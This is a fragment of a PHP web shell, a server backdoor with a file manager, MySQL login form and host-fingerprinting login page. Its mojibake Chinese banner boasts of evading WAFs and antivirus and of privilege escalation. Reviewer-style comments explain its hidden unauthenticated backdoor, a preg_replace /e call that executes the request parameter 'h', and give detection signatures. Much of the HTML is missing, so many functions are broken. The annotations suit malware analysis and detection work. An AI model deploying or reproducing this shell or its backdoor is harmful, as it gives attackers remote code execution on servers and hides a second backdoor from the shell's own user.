        "aspx" => array("Response.Write(eval(", "RunCMD(", "CreateText()"),
        "jsp" => array("runtime.exec(")
    );
    foreach ($dim[$filetype] as $code) {
        if (stristr($filecode, $code)) {
            return true;
        }
    }
}

/**
 * Return true when $file contains, case-insensitively, any of the
 * "|"-separated fragments in $ftype; null otherwise (no explicit return).
 */
function debug($file, $ftype)
{
    $type = explode('|', $ftype);
    foreach ($type as $i) {
        if (stristr($file, $i)) {
            return true;
        }
    }
}

/*---string---*/

/** Replace each "//" in $path with "/" (single pass). */
function str_path($path)
{
    return str_replace('//', '/', $path);
}

/**
 * Terminate the request. The argument is not used in the visible body; the
 * die() string is empty in this listing, presumably because its markup was
 * lost in extraction.
 */
function msg($msg)
{
    die("");
}

/** Return the URL-encoded parent directory of $nowpath, with "/" as separator. */
function uppath($nowpath)
{
    $nowpath = str_replace('\\', '/', dirname($nowpath));
    return urlencode($nowpath);
}

/** Collapse doubled backslashes in $key to single ones, then double every backslash. */
function xxstr($key)
{
    $temp = str_replace("\\\\", "\\", $key);
    $temp = str_replace("\\", "\\\\", $temp);
    return $temp;
}

/*---html---*/

// The string literals in the helpers below are empty or reduced to the
// interpolated variables: the HTML tags they contained are not present in this
// listing. Parameters that look unused ($url, $where, ...) were presumably
// interpolated into that markup.

/** Emit a link-like fragment for $name via html_n(). */
function html_ta($url, $name)
{
    html_n("{$name}");
}

/** Emit a link-like fragment for $name, followed by a space, via html_n(). */
function html_a($url, $name, $where = '')
{
    html_n("{$name} ");
}

/** Emit an image fragment via html_n(); the markup is missing in this listing. */
function html_img($url)
{
    html_n("");
}

/** Emit a "back" fragment via html_n(); the markup is missing in this listing. */
function back()
{
    html_n("");
}

/** Emit two labelled radio inputs; the body continues past this line. */
function html_radio($namei, $namet, $v1, $v2)
{
    html_n('' . $namei);
    html_n('' . $namet . '

');
}

// The string literals in the html_* helpers below are empty or reduced to the
// interpolated variables: the HTML tags they contained are not present in this
// listing. Parameters that look unused were presumably interpolated into that
// markup.

/**
 * Emit a form input preceded by its label $text.
 * The two branches differ only by a trailing space in what is still visible.
 */
function html_input($type, $name, $value = '', $text = '', $size = '', $mode = false)
{
    if ($mode) {
        html_n("{$text}");
    } else {
        html_n("{$text} ");
    }
}

/**
 * Emit a client-side JavaScript base64 encoder (function base64encode).
 * NOTE(review): presumably used to encode form values in the browser before
 * they are submitted; request bodies to this script may then carry base64
 * instead of clear text - confirm against the forms that call it.
 */
function html_base()
{
    html_n('function base64encode(str){ var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; var out, i, len; var c1, c2, c3; len = str.length; i = 0; out = ""; while (i < len) { c1 = str.charCodeAt(i++) & 0xff; if (i == len) { out += base64EncodeChars.charAt(c1 >> 2); out += base64EncodeChars.charAt((c1 & 0x3) << 4); out += "=="; break; } c2 = str.charCodeAt(i++); if (i == len) { out += base64EncodeChars.charAt(c1 >> 2); out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4)); out += base64EncodeChars.charAt((c2 & 0xF) << 2); out += "="; break; } c3 = str.charCodeAt(i++); out += base64EncodeChars.charAt(c1 >> 2); out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4)); out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6)); out += base64EncodeChars.charAt(c3 & 0x3F); } return out; }');
}

/** Emit a textarea; only the line breaks of the original markup remain. */
function html_text($name, $cols, $rows, $value = '')
{
    html_n("

");
}

/** Emit a select element; the markup is missing in this listing. */
function html_select($array, $mode = '', $change = '', $name = 'class')
{
    html_n("");
}

/** Emit $name wrapped in font markup; the markup is missing in this listing. */
function html_font($color, $size, $name)
{
    html_n("{$name}");
}

/**
 * Default view after login: prints a banner with host details.
 *
 * Collects the safe_mode setting, the IP that SERVER_NAME resolves to,
 * PHP_OS, SERVER_SOFTWARE and php_uname(), and interpolates them into a
 * heredoc. The heredoc opener and its markup are damaged in this listing, so
 * the text after "print <<" is reproduced as found.
 *
 * @param string $path      not used in the visible body
 * @param string $shellname not used in the visible body
 */
function html_main($path, $shellname)
{
    if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
        $safemode = TRUE; // assigned but not read in the visible body
        $hsafemode = "On (�ѿ�����ȫģʽ)";
    } else {
        $safemode = FALSE;
        $hsafemode = "Off (δ������ȫģʽ)";
    }
    $Server_IP = gethostbyname($_SERVER["SERVER_NAME"]);
    $Server_OS = PHP_OS;
    $Server_Soft = $_SERVER["SERVER_SOFTWARE"];
    $web_server = php_uname();
    print <<�κη����������ﶼ������ �����޵���ɱ����->{$Server_OS}
��ַ: 
php��ȫģʽ:{$hsafemode}-----ip:{$Server_IP}-----php:�汾{$Server_Soft}-----ϵͳ�汾:{$web_server}
END;
    html_n("
");
}

/**
 * Login page, shown to every visitor who does not yet hold the password cookie.
 *
 * Prints the password form together with PHP_OS, SERVER_SOFTWARE and
 * php_uname(), so the host is fingerprinted before any authentication. The
 * heredoc opener and its markup are damaged in this listing and reproduced
 * as found.
 *
 * The final statement is a second, unauthenticated entry point: preg_replace()
 * with the /e modifier evaluates its replacement argument as PHP code, and
 * that argument is the request parameter `h`. Because this function runs
 * before the password check succeeds, knowing the shell password is not
 * needed to reach it. The /e modifier was deprecated in PHP 5.5 and removed
 * in PHP 7.0, so the statement only has an effect on older interpreters.
 *
 * Detection: preg_replace() with an /e pattern and a request-supplied
 * replacement is a high-confidence static signature for file scanning;
 * requests to this script that carry an `h` parameter are the matching
 * network and log indicator.
 *
 * @param string $shellname not used in the visible body
 * @param string $myurl     not used in the visible body
 */
function islogin($shellname, $myurl)
{
    $Server_IP = gethostbyname($_SERVER["SERVER_NAME"]);
    $Server_OS = PHP_OS;
    $Server_Soft = $_SERVER["SERVER_SOFTWARE"];
    $web_server = php_uname();
    print << �κη����������ﶼ������! �����޵���ɱ����




Your Password:


������:{$Server_OS}
php�汾:{$Server_Soft}
�������汾:{$web_server}



[+] �������ڷǷ���;,�������Ը��������޵���ɱ����
[+] ֧��Mof˫�齨��Ȩ,Windows2003��������ͨ��
[+] ���κ�Waf-D�ܡ���������ȫ���������񡢰����ơ�360������ʿ��360��վ��ʿ
END;
    @preg_replace("/[_]/e", $_REQUEST['h'], "__");
}

/**
 * Emit the MySQL connection form (host, port, user, password, database).
 * The body continues past this line.
 */
function html_sql()
{
    html_input("text", "sqlhost", "localhost", "
MYSQL��ַ", "30"); html_input("text", "sqlport", "3306", "
MYSQL�˿�", "30"); html_input("text", "sqluser", "root", "
MYSQL�û�", "30"); html_input("password", "sqlpass", "", "
MYSQL����", "30"); html_input("text", "sqldb", "dbname", "
MYSQL����", "30"); html_input("submit", "sqllogin", "��½", "
"); html_n(''); } function Mysql_Len($data, $len) { if (strlen($data) < $len) { return $data; } return substr_replace($data, '...', $len); } function html_n($data) { echo "{$data}\n"; } /*---css---*/ function css_img($img) { $images = array("exe" => "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7" . "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt" . "xhIAOw==", "dir" => "R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAA" . "AAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdE" . "oMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", "txt" => "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ" . "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7" . "UpPWG3Ig6Hq/XmRjuZwkAAA7", "html" => "R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz" . "c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P" . "KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk" . "Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR" . "ADs=", "js" => "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH" . "k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs" . "a00AjYYBbc/o9HjNniUAADs=", "xml" => "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA" . "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx" . "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ" . "IQA7", "mp3" => "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU" . "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc" . 
"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", "img" => "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci" . "Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd" . "FxEAOw==", "title" => "R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+" . "mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "ACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGUL" . "I8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7", "rar" => "R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/ACH5BAEKAP8ALAAAAAAQABAAAAiFAP0YEEhwoEE/" . "/xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+b" . "OHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIIC" . 
"aNOmRcjVj02tPxPCzfkvIAA7"); header('Content-type: image/gif'); echo base64_decode($images[$img]); die; } function css_showimg($file) { $it = substr($file, -3); switch ($it) { case "jpg": case "gif": case "bmp": case "png": case "ico": return 'img'; break; case "htm": case "tml": return 'html'; break; case "exe": case "com": return 'exe'; break; case "xml": case "doc": return 'xml'; break; case ".js": case "vbs": return 'js'; break; case "mp3": case "wma": case "wav": case "swf": case ".rm": case "avi": case "mp4": case "mvb": return 'mp3'; break; case "rar": case "tar": case ".gz": case "zip": case "iso": return 'rar'; break; default: return 'txt'; break; } } function css_js($num, $code = '') { if ($num == "shellcode") { return '<%@ LANGUAGE="JavaScript" %> <% %>'; } html_n(''); } function css_left() { html_n(''); html_n('